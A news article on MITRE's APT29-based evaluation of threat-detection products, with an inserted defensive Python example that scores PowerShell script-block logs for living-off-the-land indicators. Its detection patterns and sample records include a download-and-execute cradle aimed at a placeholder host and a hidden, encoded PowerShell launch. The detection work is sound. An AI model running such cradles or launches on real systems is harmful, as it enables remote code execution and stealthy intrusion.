MITRE asks vendors to do more to detect stealthy hacks

APT29 is the muse, but the evaluation is also about ensuring that products can detect "living off the land" techniques.

As hackers continue to use native programming tools to blend into target networks, Mitre Corp. is beginning to test vendors’ ability to detect those techniques.

The federally funded, not-for-profit organization announced Wednesday it would throw the stealthy tactics of an infamous hacking group, the Russian-government-linked APT29, at several threat-detection products.

But the evaluation is about more than one set of adversaries. The “living off the land” techniques, such as hiding in PowerShell scripts, that will be tested are increasingly popular with a variety of hacking groups.

“A lot of these techniques are going to be implemented in similar ways from different adversaries,” said Frank Duff, Mitre’s lead for evaluations that use the organization’s ATT&CK framework.


“PowerShell monitoring is that next thing that everyone recognizes is absolutely necessary,” he added.

Mitre’s last round of testing focused on advanced persistent threats, mimicking the tactics of APT3, a China-based group known for using internet-browser exploits. But the techniques of APT29, best known for being one of two Russian outfits to breach the Democratic National Committee before the 2016 U.S. election, will be a stiffer test, according to Duff.

“Because it’s a more sophisticated adversary, they do a lot more in terms of scripting, a lot more in terms of using built-in Windows [application programming interfaces],” he told CyberScoop. “Unless you have the right sensoring and the right ways of whittling ways through large amounts of noise, it’s going to be a harder thing for these vendors to succeed at.”
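Duff's two points, having the right sensors and whittling through the noise they produce, can be made concrete. The block below is an added example written for this page; it is not code from Mitre, from the ATT&CK evaluation, or from any vendor. It triages PowerShell script block log records in the shape of Windows Event ID 4104 (a ScriptBlockText field plus the on-disk Path, if any) for common living-off-the-land indicators, decodes an encoded command so an analyst can read it, and applies an allow-list of trusted script locations so routine administration does not alert on a single weak indicator. The sample records, the indicator weights, the threshold and the allow-list are all constructed assumptions.

```python
"""Triage PowerShell script block log records (Event ID 4104 shape) for
living-off-the-land indicators.  Added example; records are constructed."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicator patterns with weights.  A weak indicator alone (for example
# -NoProfile) is normal admin behaviour; several together are not.
# The list is illustrative, not exhaustive.
INDICATORS = {
    "encoded_command": (re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I), 2),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "policy_bypass": (re.compile(r"-ep\s+bypass|ExecutionPolicy\s+Bypass", re.I), 1),
    "no_profile": (re.compile(r"-nop\b|-NoProfile", re.I), 1),
}

# Constructed allow-list: scripts that ship with the organisation's own
# software produce most legitimate 4104 volume, so they need a higher score.
TRUSTED_PATH_PREFIXES = ("C:\\Program Files\\", "C:\\Windows\\System32\\WindowsPowerShell\\")
ALERT_THRESHOLD = 3
TRUSTED_PATH_EXTRA = 2

ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


@dataclass
class Finding:
    record_id: int
    score: int
    hits: List[str] = field(default_factory=list)
    decoded: Optional[str] = None  # plaintext of an -EncodedCommand payload, if any
    alert: bool = False


def decode_encoded_command(block: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return it readable."""
    m = ENCODED_RE.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(record_id: int, event: dict) -> Finding:
    """Score one 4104-style record and decide whether it crosses the alert line."""
    text = event["ScriptBlockText"]
    path = event.get("Path") or ""
    finding = Finding(record_id=record_id, score=0)
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(text):
            finding.hits.append(name)
            finding.score += weight
    finding.decoded = decode_encoded_command(text)
    # Noise control: a block loaded from a trusted on-disk path must show
    # more evidence before it alerts than an in-memory block with no path.
    threshold = ALERT_THRESHOLD
    if path.startswith(TRUSTED_PATH_PREFIXES):
        threshold += TRUSTED_PATH_EXTRA
    finding.alert = finding.score >= threshold
    return finding


def triage_all(events: List[dict]) -> List[Finding]:
    return [triage(i, ev) for i, ev in enumerate(events)]


# Constructed sample records in the shape of exported 4104 events.
_ENCODED_DEMO = base64.b64encode("Write-Host 'hello from encoded block'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'",
     "Path": "C:\\Program Files\\Contoso\\inventory.ps1"},
    {"ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')",
     "Path": None},
    {"ScriptBlockText": f"powershell -nop -w hidden -enc {_ENCODED_DEMO}",
     "Path": None},
    {"ScriptBlockText": "powershell -NoProfile -File C:\\Program Files\\Contoso\\cleanup.ps1",
     "Path": "C:\\Program Files\\Contoso\\cleanup.ps1"},
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        flag = "ALERT" if f.alert else "ok   "
        print(f"{flag} record={f.record_id} score={f.score} hits={f.hits} decoded={f.decoded!r}")
```

Of the four constructed records only the in-memory download cradle and the encoded, hidden-window launch alert; the two scripts under `C:\Program Files\` stay below the raised threshold even though one of them carries a weak indicator. Decoding the encoded payload shows why visibility matters more than the indicator itself: here the content is harmless, and an analyst can dismiss it in seconds instead of guessing.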

The first round of APT3 evaluations tested products made by vendors such as Carbon Black, CrowdStrike, Endgame, and Microsoft. Mitre is hoping for similarly robust participation this go-round.

Duff said the APT29 test will incorporate a range of data from the group’s activity. After a relative lull in activity, APT29 appeared to rear its head last fall in a spearphishing campaign against U.S. military and defense contractors.


Don’t expect the Mitre team to simulate tactics used by every APT group. Instead, evaluators are testing tactics employed by groups that offer valuable defensive lessons to the broader cybersecurity industry, according to Duff.

The inclusion of APT29 techniques in the testing, which will begin this summer, is meant to “really push the boundaries forward” for vendors, he said.

Written by Sean Lyngaas

Sean Lyngaas is CyberScoop’s Senior Reporter covering the Department of Homeland Security and Congress. He was previously a freelance journalist in West Africa, where he covered everything from a presidential election in Ghana to military mutinies in Ivory Coast for The New York Times. Lyngaas’ reporting also has appeared in The Washington Post, The Economist and the BBC, among other outlets. His investigation of cybersecurity issues in the nuclear sector, backed by a grant from the Pulitzer Center on Crisis Reporting, won plaudits from industrial security experts. He was previously a reporter with Federal Computer Week and, before that, with Smart Grid Today. Sean earned a B.A. in public policy from Duke University and an M.A. in International Relations from The Fletcher School of Law and Diplomacy at Tufts University.